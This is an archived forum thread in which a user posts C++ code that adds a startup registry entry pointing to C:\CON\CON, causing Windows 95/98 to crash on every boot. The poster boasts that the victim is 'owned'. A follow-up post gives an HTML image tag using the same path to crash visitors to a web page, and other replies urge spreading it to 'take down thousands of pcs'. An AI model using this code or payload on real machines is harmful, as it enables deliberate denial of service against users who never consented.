 |
| Archives Old useless posts are moved here. |

23-02-2007, 10:50 PM
|
 |
ਸਤਿ ਸ੍ਰੀ ਅਕਾਲ
|
|
Join Date: Jan 2007
Posts: 60
|
|
[C++] Force Windows 95/98 to crash on startup
EDIT: I forgot the [C++] tag, any mod/admin mind adding that for me?
#include <windows.h>
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
BYTE Data[11] = { 'C',':','\\','C','O','N','\\','C','O','N','\0' };
HKEY KeyHandle;
RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&KeyHandle);
RegSetValueEx(KeyHandle,"StartupService",NULL,REG_SZ,Data,11);
RegCloseKey(KeyHandle);
return 0;
}
Once the user restarts their computer, they're owned.
Last edited by SMR; 24-02-2007 at 05:08 PM..
|

24-02-2007, 09:35 PM
|
|
BANNED
|
|
Join Date: Jan 2007
Location: Andrew Gower's nightmares.
Posts: 1,276
|
|
If they are using windows 95/98 they deserve this. Could be useful to force some people into buying a real computer...
Last edited by ilikegrapesoda72; 24-02-2007 at 09:50 PM..
|

24-02-2007, 11:23 PM
|
 |
ਸਤਿ ਸ੍ਰੀ ਅਕਾਲ
|
|
Join Date: Jan 2007
Posts: 60
|
|
Funny thing is that this source isn't the only thing that will make it crash. All you need to do is to get Windows to try to access a file called C:\CON\CON and it brings the whole OS down.
Just add something like <IMG SRC="C:\CON\CON"> to your homepage and pwn those silly 9x users :P
|

25-02-2007, 07:50 PM
|
|
Member
|
|
Join Date: Jan 2007
Posts: 77
|
|
That's halarious! :-D
|

02-07-2007, 08:53 AM
|
 |
Hi Aaron!
|
|
Join Date: Jun 2007
Location: Houston, but South
Posts: 2,670
|
|
lol find a forum for win 98/95 and put it on there. take down thousands of pcs and force microsoft into making an update for their no-longer-supported software. also to be fair u dont really need to do this to make windows 98 crash... it does it itself alot.
__________________
The White Horse man... that’s what I found... and I road it through the fields of poppies.
The Pull
The Push
The Rush
And upon a dream I floated away, my thoughts fading to gray.
To the Land of Nod thus I sway, forever more my thoughts there lay.
|

02-07-2007, 09:23 AM
|
|
Active Member
|
|
Join Date: Jun 2007
Location: Canada, Eh?
Posts: 1,161
|
|
Post this on a 95/98 forum seriously.. I mean if there even are any.
__________________
Originally Posted by UND€F€AT
Sometimes, I even skip lunch just to go on Rsf since I'm so into it! :cool:
|
|

11-07-2007, 01:36 PM
|
 |
Hi Aaron!
|
|
Join Date: Jun 2007
Location: Houston, but South
Posts: 2,670
|
|
dont post this anywhere yet... im on a windows 98 pc now >.>
__________________
The White Horse man... that’s what I found... and I road it through the fields of poppies.
The Pull
The Push
The Rush
And upon a dream I floated away, my thoughts fading to gray.
To the Land of Nod thus I sway, forever more my thoughts there lay.
|

12-07-2007, 07:58 AM
|
 |
Administrator
|
|
Join Date: Jan 2007
Location: United States - Ohio
Posts: 3,740
|
|
Owch ^
Why haven't you updated?
XP is way better (don't get ME(uber failure) or Vista(super failure)). Get XP or linux ;)
|

12-07-2007, 03:08 PM
|
 |
Hi Aaron!
|
|
Join Date: Jun 2007
Location: Houston, but South
Posts: 2,670
|
|
cuz that pc only has 120mb of ram and windows 98 lags it.
__________________
The White Horse man... that’s what I found... and I road it through the fields of poppies.
The Pull
The Push
The Rush
And upon a dream I floated away, my thoughts fading to gray.
To the Land of Nod thus I sway, forever more my thoughts there lay.
|

16-11-2007, 10:05 PM
|
|
New Member
|
|
Join Date: Nov 2007
Posts: 5
|
|
hehe very interesting, thanks for sharing this
__________________
No advertising allowed in signature.
|
|
Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
|
|
|
| Thread Tools |
|
|
| Display Modes |
Linear Mode
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
All times are GMT -5. The time now is 10:40 AM.
|
 |